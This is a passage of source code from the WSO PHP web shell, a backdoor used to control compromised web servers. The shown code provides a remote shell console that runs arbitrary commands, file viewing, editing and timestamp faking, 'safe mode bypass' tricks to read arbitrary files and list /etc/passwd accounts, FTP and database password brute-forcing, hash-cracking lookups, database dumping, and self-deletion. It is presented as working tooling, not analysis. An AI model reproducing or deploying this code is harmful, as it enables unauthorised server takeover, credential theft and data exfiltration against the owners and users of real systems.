1195 <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
1196 <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
1197 <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
1198 <tr><td></td><td><input type='submit' value='>>'></td></tr>
1199 </table></form>";
1200
1201 function wsoRecursiveGlob($path) {
1202 if(substr($path, -1) != '/')
1203 $path.='/';
1204 $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
1205 if(is_array($paths)&&@count($paths)) {
1206 foreach($paths as $item) {
1207 if(@is_dir($item)){
1208 if($path!=$item)
1209 wsoRecursiveGlob($item);
1210 } else {
1211 if(@strpos(@file_get_contents($item), @$_POST['p2'])!==false)
1212 echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\")'>".htmlspecialchars($item)."</a><br>";
1213 }
1214 }
1215 }
1216 }
1217 if(@$_POST['p3'])
1218 wsoRecursiveGlob($_POST['c']);
1219 echo "</div><br><h1>Search for hash:</h1><div class=content>
1220
1221 <form method='post' target='_blank' name='hf'>
1222 <input type='text' name='hash' style='width:200px;'><br>
1223 <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
1224 <input type='button' value='milw0rm.com' onclick=\"document.hf.action='http://www.milw0rm.com/cracker/search.php';document.hf.submit()\"><br>
1225 <input type='button' value='hashcracking.info' onclick=\"document.hf.action='https://hashcracking.info/index.php';document.hf.submit()\"><br>
1226 <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
1227 <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
1228 </form></div>";
1229 wsoFooter();
1230}
1231
1232function actionFilesTools() {
1233 if( isset($_POST['p1']) )
1234 $_POST['p1'] = urldecode($_POST['p1']);
1235 if(@$_POST['p2']=='download') {
1236 if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
1237 ob_start("ob_gzhandler", 4096);
1238 header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
1239 if (function_exists("mime_content_type")) {
1240 $type = @mime_content_type($_POST['p1']);
1241 header("Content-Type: " . $type);
1242 } else
1243 header("Content-Type: application/octet-stream");
1244 $fp = @fopen($_POST['p1'], "r");
1245 if($fp) {
1246 while(!@feof($fp))
1247 echo @fread($fp, 1024);
1248 fclose($fp);
1249 }
1250 }exit;
1251 }
1252 if( @$_POST['p2'] == 'mkfile' ) {
1253 if(!file_exists($_POST['p1'])) {
1254 $fp = @fopen($_POST['p1'], 'w');
1255 if($fp) {
1256 $_POST['p2'] = "edit";
1257 fclose($fp);
1258 }
1259 }
1260 }
1261 wsoHeader();
1262 echo '<h1>File tools</h1><div class=content>';
1263 if( !file_exists(@$_POST['p1']) ) {
1264 echo 'File not exists';
1265 wsoFooter();
1266 return;
1267 }
1268 $uid = @posix_getpwuid(@fileowner($_POST['p1']));
1269 if(!$uid) {
1270 $uid['name'] = @fileowner($_POST['p1']);
1271 $gid['name'] = @filegroup($_POST['p1']);
1272 } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
1273 echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
1274 echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
1275 if( empty($_POST['p2']) )
1276 $_POST['p2'] = 'view';
1277 if( is_file($_POST['p1']) )
1278 $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
1279 else
1280 $m = array('Chmod', 'Rename', 'Touch');
1281 foreach($m as $v)
1282 echo '<a href=# onclick="g(null,null,null,\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
1283 echo '<br><br>';
1284 switch($_POST['p2']) {
1285 case 'view':
1286 echo '<pre class=ml1>';
1287 $fp = @fopen($_POST['p1'], 'r');
1288 if($fp) {
1289 while( !@feof($fp) )
1290 echo htmlspecialchars(@fread($fp, 1024));
1291 @fclose($fp);
1292 }
1293 echo '</pre>';
1294 break;
1295 case 'highlight':
1296 if( @is_readable($_POST['p1']) ) {
1297 echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
1298 $code = @highlight_file($_POST['p1'],true);
1299 echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
1300 }
1301 break;
1302 case 'chmod':
1303 if( !empty($_POST['p3']) ) {
1304 $perms = 0;
1305 for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
1306 $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
1307 if(!@chmod($_POST['p1'], $perms))
1308 echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
1309 }
1310 clearstatcache();
1311 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
1312 break;
1313 case 'edit':
1314 if( !is_writable($_POST['p1'])) {
1315 echo 'File isn\'t writeable';
1316 break;
1317 }
1318 if( !empty($_POST['p3']) ) {
1319 $time = @filemtime($_POST['p1']);
1320 $_POST['p3'] = substr($_POST['p3'],1);
1321 $fp = @fopen($_POST['p1'],"w");
1322 if($fp) {
1323 @fwrite($fp,$_POST['p3']);
1324 @fclose($fp);
1325 echo 'Saved!<br><script>p3_="";</script>';
1326 @touch($_POST['p1'],$time,$time);
1327 }
1328 }
1329 echo '<form onsubmit="g(null,null,null,null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
1330 $fp = @fopen($_POST['p1'], 'r');
1331 if($fp) {
1332 while( !@feof($fp) )
1333 echo htmlspecialchars(@fread($fp, 1024));
1334 @fclose($fp);
1335 }
1336 echo '</textarea><input type=submit value=">>"></form>';
1337 break;
1338 case 'hexdump':
1339 $c = @file_get_contents($_POST['p1']);
1340 $n = 0;
1341 $h = array('00000000<br>','','');
1342 $len = strlen($c);
1343 for ($i=0; $i<$len; ++$i) {
1344 $h[1] .= sprintf('%02X',ord($c[$i])).' ';
1345 switch ( ord($c[$i]) ) {
1346 case 0: $h[2] .= ' '; break;
1347 case 9: $h[2] .= ' '; break;
1348 case 10: $h[2] .= ' '; break;
1349 case 13: $h[2] .= ' '; break;
1350 default: $h[2] .= $c[$i]; break;
1351 }
1352 $n++;
1353 if ($n == 32) {
1354 $n = 0;
1355 if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
1356 $h[1] .= '<br>';
1357 $h[2] .= "\n";
1358 }
1359 }
1360 echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
1361 break;
1362 case 'rename':
1363 if( !empty($_POST['p3']) ) {
1364 if(!@rename($_POST['p1'], $_POST['p3']))
1365 echo 'Can\'t rename!<br>';
1366 else
1367 die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
1368 }
1369 echo '<form onsubmit="g(null,null,null,null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
1370 break;
1371 case 'touch':
1372 if( !empty($_POST['p3']) ) {
1373 $time = strtotime($_POST['p3']);
1374 if($time) {
1375 if(!touch($_POST['p1'],$time,$time))
1376 echo 'Fail!';
1377 else
1378 echo 'Touched!';
1379 } else echo 'Bad time format!';
1380 }
1381 clearstatcache();
1382 echo '<script>p3_="";</script><form onsubmit="g(null,null,null,null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
1383 break;
1384 }
1385 echo '</div>';
1386 wsoFooter();
1387}
1388
1389function actionSafeMode() {
1390 $temp='';
1391 ob_start();
1392 switch($_POST['p1']) {
1393 case 1:
1394 $temp=@tempnam($test, 'cx');
1395 if(@copy("compress.zlib://".$_POST['p2'], $temp)){
1396 echo @file_get_contents($temp);
1397 unlink($temp);
1398 } else
1399 echo 'Sorry... Can\'t open file';
1400 break;
1401 case 2:
1402 $files = glob($_POST['p2'].'*');
1403 if( is_array($files) )
1404 foreach ($files as $filename)
1405 echo $filename."\n";
1406 break;
1407 case 3:
1408 $ch = curl_init("file://".$_POST['p2']."\x00".preg_replace('!\(\d+\)\s.*!', '', __FILE__));
1409 curl_exec($ch);
1410 break;
1411 case 4:
1412 ini_restore("safe_mode");
1413 ini_restore("open_basedir");
1414 include($_POST['p2']);
1415 break;
1416 case 5:
1417 for(;$_POST['p2'] <= $_POST['p3'];$_POST['p2']++) {
1418 $uid = @posix_getpwuid($_POST['p2']);
1419 if ($uid)
1420 echo join(':',$uid)."\n";
1421 }
1422 break;
1423 }
1424 $temp = ob_get_clean();
1425 wsoHeader();
1426 echo '<h1>Safe mode bypass</h1><div class=content>';
1427 echo '<span>Copy (read file)</span><form onsubmit=\'g(null,null,"1",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Glob (list dir)</span><form onsubmit=\'g(null,null,"2",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Curl (read file)</span><form onsubmit=\'g(null,null,"3",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Ini_restore (read file)</span><form onsubmit=\'g(null,null,"4",this.param.value);return false;\'><input type=text name=param><input type=submit value=">>"></form><br><span>Posix_getpwuid ("Read" /etc/passwd)</span><table><form onsubmit=\'g(null,null,"5",this.param1.value,this.param2.value);return false;\'><tr><td>From</td><td><input type=text name=param1 value=0></td></tr><tr><td>To</td><td><input type=text name=param2 value=1000></td></tr></table><input type=submit value=">>"></form>';
1428 if($temp)
1429 echo '<pre class="ml1" style="margin-top:5px" id="Output">'.htmlspecialchars($temp).'</pre>';
1430 echo '</div>';
1431 wsoFooter();
1432}
1433
1434function actionConsole() {
1435 if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
1436 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = true;
1437 $_POST['p1'] .= ' 2>&1';
1438 } elseif(!empty($_POST['p1']))
1439 $_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out'] = false;
1440
1441 if(isset($_POST['ajax'])) {
1442 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
1443 ob_start();
1444 echo "d.cf.cmd.value='';\n";
1445 $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0"));
1446 if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
1447 if(@chdir($match[1])) {
1448 $GLOBALS['cwd'] = @getcwd();
1449 echo "c_='".$GLOBALS['cwd']."';";
1450 }
1451 }
1452 echo "d.cf.output.value+='".$temp."';";
1453 echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
1454 $temp = ob_get_clean();
1455 echo strlen($temp), "\n", $temp;
1456 exit;
1457 }
1458 wsoHeader();
1459 echo "<script>
1460if(window.Event) window.captureEvents(Event.KEYDOWN);
1461var cmds = new Array('');
1462var cur = 0;
1463function kp(e) {
1464 var n = (window.Event) ? e.which : e.keyCode;
1465 if(n == 38) {
1466 cur--;
1467 if(cur>=0)
1468 document.cf.cmd.value = cmds[cur];
1469 else
1470 cur++;
1471 } else if(n == 40) {
1472 cur++;
1473 if(cur < cmds.length)
1474 document.cf.cmd.value = cmds[cur];
1475 else
1476 cur--;
1477 }
1478}
1479function add(cmd) {
1480 cmds.pop();
1481 cmds.push(cmd);
1482 cmds.push('');
1483 cur = cmds.length-1;
1484}
1485
1486</script>";
1487 echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
1488 foreach($GLOBALS['aliases'] as $n => $v) {
1489 if($v == '') {
1490 echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
1491 continue;
1492 }
1493 echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
1494 }
1495 if(empty($_POST['ajax'])&&!empty($_POST['p1']))
1496 $_SESSION[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
1497 echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_SESSION[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_SESSION[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
1498 if(!empty($_POST['p1'])) {
1499 echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1']));
1500 }
1501 echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
1502 echo '</form></div><script>d.cf.cmd.focus();</script>';
1503 wsoFooter();
1504}
1505
1506function actionLogout() {
1507 session_destroy();
1508 die('bye!');
1509}
1510
1511function actionSelfRemove() {
1512
1513 if($_POST['p1'] == 'yes')
1514 if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__)))
1515 die('Shell has been removed');
1516 else
1517 echo 'unlink error!';
1518 if($_POST['p1'] != 'yes')
1519 wsoHeader();
1520 echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>';
1521 wsoFooter();
1522}
1523
1524function actionBruteforce() {
1525 wsoHeader();
1526 if( isset($_POST['proto']) ) {
1527 echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>';
1528 if( $_POST['proto'] == 'ftp' ) {
1529 function bruteForce($ip,$port,$login,$pass) {
1530 $fp = @ftp_connect($ip, $port?$port:21);
1531 if(!$fp) return false;
1532 $res = @ftp_login($fp, $login, $pass);
1533 @ftp_close($fp);
1534 return $res;
1535 }
1536 } elseif( $_POST['proto'] == 'mysql' ) {
1537 function bruteForce($ip,$port,$login,$pass) {
1538 $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass);
1539 @mysql_close($res);
1540 return $res;
1541 }
1542 } elseif( $_POST['proto'] == 'pgsql' ) {
1543 function bruteForce($ip,$port,$login,$pass) {
1544 $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres";
1545 $res = @pg_connect($str);
1546 @pg_close($res);
1547 return $res;
1548 }
1549 }
1550 $success = 0;
1551 $attempts = 0;
1552 $server = explode(":", $_POST['server']);
1553 if($_POST['type'] == 1) {
1554 $temp = @file('/etc/passwd');
1555 if( is_array($temp) )
1556 foreach($temp as $line) {
1557 $line = explode(":", $line);
1558 ++$attempts;
1559 if( bruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) {
1560 $success++;
1561 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>';
1562 }
1563 if(@$_POST['reverse']) {
1564 $tmp = "";
1565 for($i=strlen($line[0])-1; $i>=0; --$i)
1566 $tmp .= $line[0][$i];
1567 ++$attempts;
1568 if( bruteForce(@$server[0],@$server[1], $line[0], $tmp) ) {
1569 $success++;
1570 echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp);
1571 }
1572 }
1573 }
1574 } elseif($_POST['type'] == 2) {
1575 $temp = @file($_POST['dict']);
1576 if( is_array($temp) )
1577 foreach($temp as $line) {
1578 $line = trim($line);
1579 ++$attempts;
1580 if( bruteForce($server[0],@$server[1], $_POST['login'], $line) ) {
1581 $success++;
1582 echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>';
1583 }
1584 }
1585 }
1586 echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>";
1587 }
1588 echo '<h1>FTP bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>'
1589 .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>'
1590 .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">'
1591 .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">'
1592 .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">'
1593 .'<span>Server:port</span></td>'
1594 .'<td><input type=text name=server value="127.0.0.1"></td></tr>'
1595 .'<tr><td><span>Brute type</span></td>'
1596 .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>'
1597 .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>'
1598 .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>'
1599 .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>'
1600 .'<td><input type=text name=login value="root"></td></tr>'
1601 .'<tr><td><span>Dictionary</span></td>'
1602 .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>'
1603 .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>';
1604 echo '</div><br>';
1605 wsoFooter();
1606}
1607
1608function actionSql() {
1609 class DbClass {
1610 var $type;
1611 var $link;
1612 var $res;
1613 function DbClass($type) {
1614 $this->type = $type;
1615 }
1616 function connect($host, $user, $pass, $dbname){
1617 switch($this->type) {
1618 case 'mysql':
1619 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
1620 break;
1621 case 'pgsql':
1622 $host = explode(':', $host);
1623 if(!$host[1]) $host[1]=5432;
1624 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
1625 break;
1626 }
1627 return false;
1628 }
1629 function selectdb($db) {
1630 switch($this->type) {
1631 case 'mysql':
1632 if (@mysql_select_db($db))return true;
1633 break;
1634 }
1635 return false;
1636 }
1637 function query($str) {
1638 switch($this->type) {
1639 case 'mysql':
1640 return $this->res = @mysql_query($str);
1641 break;
1642 case 'pgsql':
1643 return $this->res = @pg_query($this->link,$str);
1644 break;
1645 }
1646 return false;
1647 }
1648 function fetch() {
1649 $res = func_num_args()?func_get_arg(0):$this->res;
1650 switch($this->type) {
1651 case 'mysql':
1652 return @mysql_fetch_assoc($res);
1653 break;
1654 case 'pgsql':
1655 return @pg_fetch_assoc($res);
1656 break;
1657 }
1658 return false;
1659 }
1660 function listDbs() {
1661 switch($this->type) {
1662 case 'mysql':
1663 return $this->query("SHOW databases");
1664 break;
1665 case 'pgsql':
1666 return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
1667 break;
1668 }
1669 return false;
1670 }
1671 function listTables() {
1672 switch($this->type) {
1673 case 'mysql':
1674 return $this->res = $this->query('SHOW TABLES');
1675 break;
1676 case 'pgsql':
1677 return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
1678 break;
1679 }
1680 return false;
1681 }
1682 function error() {
1683 switch($this->type) {
1684 case 'mysql':
1685 return @mysql_error();
1686 break;
1687 case 'pgsql':
1688 return @pg_last_error();
1689 break;
1690 }
1691 return false;
1692 }
1693 function setCharset($str) {
1694 switch($this->type) {
1695 case 'mysql':
1696 if(function_exists('mysql_set_charset'))
1697 return @mysql_set_charset($str, $this->link);
1698 else
1699 $this->query('SET CHARSET '.$str);
1700 break;
1701 case 'pgsql':
1702 return @pg_set_client_encoding($this->link, $str);
1703 break;
1704 }
1705 return false;
1706 }
1707 function loadFile($str) {
1708 switch($this->type) {
1709 case 'mysql':
1710 return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
1711 break;
1712 case 'pgsql':
1713 $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;");
1714 $r=array();
1715 while($i=$this->fetch())
1716 $r[] = $i['file'];
1717 $this->query('drop table wso2');
1718 return array('file'=>implode("\n",$r));
1719 break;
1720 }
1721 return false;
1722 }
1723 function dump($table, $fp = false) {
1724 switch($this->type) {
1725 case 'mysql':
1726 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
1727 $create = mysql_fetch_array($res);
1728 $sql = $create[1].";\n";
1729 if($fp) fwrite($fp, $sql); else echo($sql);
1730 $this->query('SELECT * FROM `'.$table.'`');
1731 $head = true;
1732 while($item = $this->fetch()) {
1733 $columns = array();
1734 foreach($item as $k=>$v) {
1735 if($v == null)
1736 $item[$k] = "NULL";
1737 elseif(is_numeric($v))
1738 $item[$k] = $v;
1739 else
1740 $item[$k] = "'".@mysql_real_escape_string($v)."'";
1741 $columns[] = "`".$k."`";
1742 }
1743 if($head) {
1744 $sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
1745 $head = false;
1746 } else
1747 $sql = "\n\t,(".implode(", ", $item).')';
1748 if($fp) fwrite($fp, $sql); else echo($sql);
1749 }
1750 if(!$head)
1751 if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
1752 break;
1753 case 'pgsql':
1754 $this->query('SELECT * FROM '.$table);
1755 while($item = $this->fetch()) {
1756 $columns = array();
1757 foreach($item as $k=>$v) {
1758 $item[$k] = "'".addslashes($v)."'";
1759 $columns[] = $k;
1760 }
1761 $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
1762 if($fp) fwrite($fp, $sql); else echo($sql);
1763 }
1764 break;
1765 }
1766 return false;
1767 }
1768 };
1769 $db = new DbClass($_POST['type']);
1770 if(@$_POST['p2']=='download') {
1771 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
1772 $db->selectdb($_POST['sql_base']);
1773 switch($_POST['charset']) {
1774 case "Windows-1251": $db->setCharset('cp1251'); break;
1775 case "UTF-8": $db->setCharset('utf8'); break;
1776 case "KOI8-R": $db->setCharset('koi8r'); break;
1777 case "KOI8-U": $db->setCharset('koi8u'); break;
1778 case "cp866": $db->setCharset('cp866'); break;
1779 }
1780 if(empty($_POST['file'])) {
1781 ob_start("ob_gzhandler", 4096);
1782 header("Content-Disposition: attachment; filename=dump.sql");
1783 header("Content-Type: text/plain");
1784 foreach($_POST['tbl'] as $v)
1785 $db->dump($v);
1786 exit;
1787 } elseif($fp = @fopen($_POST['file'], 'w')) {
1788 foreach($_POST['tbl'] as $v)
1789 $db->dump($v, $fp);
1790 fclose($fp);
1791 unset($_POST['p2']);
1792 } else
1793 die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>');
1794 }
1795 wsoHeader();
1796 echo "
1797
1798<h1>Sql browser</h1><div class=content>
1799<form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
1800<td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
1801<input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
1802<td><select name='type'><option value='mysql' ";
1803 if(@$_POST['type']=='mysql')echo 'selected';
1804echo ">MySql</option><option value='pgsql' ";
1805if(@$_POST['type']=='pgsql')echo 'selected';
1806echo ">PostgreSql</option></select></td>
1807<td><input type=text name=sql_host value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
1808<td><input type=text name=sql_login value='". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."'></td>
1809<td><input type=text name=sql_pass value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
1810 $tmp = "<input type=text name=sql_base value=''>";
1811 if(isset($_POST['sql_host'])){
1812 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
1813 switch($_POST['charset']) {
1814 case "Windows-1251": $db->setCharset('cp1251'); break;
1815 case "UTF-8": $db->setCharset('utf8'); break;
1816 case "KOI8-R": $db->setCharset('koi8r'); break;
1817 case "KOI8-U": $db->setCharset('koi8u'); break;
1818 case "cp866": $db->setCharset('cp866'); break;
1819 }
1820 $db->listDbs();
1821 echo "<select name=sql_base><option value=''></option>";
1822 while($item = $db->fetch()) {
1823 list($key, $value) = each($item);
1824 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
1825 }
1826 echo '</select>';
1827 }
1828 else echo $tmp;
1829 }else
1830 echo $tmp;
1831 echo "</td>
1832
1833 <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
1834 <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
1835 </tr>
1836 </table>
1837 <script>
1838 s_db='".@addslashes($_POST['sql_base'])."';
1839 function fs(f) {
1840 if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
1841 if(f.p1) f.p1.value='';
1842 if(f.p2) f.p2.value='';
1843 if(f.p3) f.p3.value='';
1844 }
1845 }
1846 function st(t,l) {
1847 d.sf.p1.value = 'select';
1848 d.sf.p2.value = t;
1849 if(l && d.sf.p3) d.sf.p3.value = l;
1850 d.sf.submit();
1851 }
1852 function is() {
1853 for(i=0;i<d.sf.elements['tbl[]'].length;++i)
1854 d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
1855 }
1856 </script>";
1857 if(isset($db) && $db->link){
1858 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
1859 if(!empty($_POST['sql_base'])){
1860 $db->selectdb($_POST['sql_base']);
1861 echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>";
1862 $tbls_res = $db->listTables();
1863 while($item = $db->fetch($tbls_res)) {
1864 list($key, $value) = each($item);
1865 if(!empty($_POST['sql_count']))
1866 $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
1867 $value = htmlspecialchars($value);
1868 echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'> <a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?' ':" <small>({$n['n']})</small>") . "</nobr><br>";
1869 }
1870 echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>";
1871 if(@$_POST['p1'] == 'select') {
1872 $_POST['p1'] = 'query';
1873 $_POST['p3'] = $_POST['p3']?$_POST['p3']:1;
1874 $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']);
1875 $num = $db->fetch();
1876 $pages = ceil($num['n'] / 30);
1877 echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">";
1878 echo " of $pages";
1879 if($_POST['p3'] > 1)
1880 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>< Prev</a>";
1881 if($_POST['p3'] < $pages)
1882 echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next ></a>";
1883 $_POST['p3']--;
1884 if($_POST['type']=='pgsql')
1885 $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
1886 else
1887 $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
1888 echo "<br><br>";
1889 }
1890 if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) {
1891 $db->query(@$_POST['p2']);
1892 if($db->res !== false) {
1893 $title = false;
1894 echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">';
1895 $line = 1;
1896 while($item = $db->fetch()) {
1897 if(!$title) {
1898 echo '<tr>';
1899 foreach($item as $key => $value)
1900 echo '<th>'.$key.'</th>';
1901 reset($item);
1902 $title=true;
1903 echo '</tr><tr>';
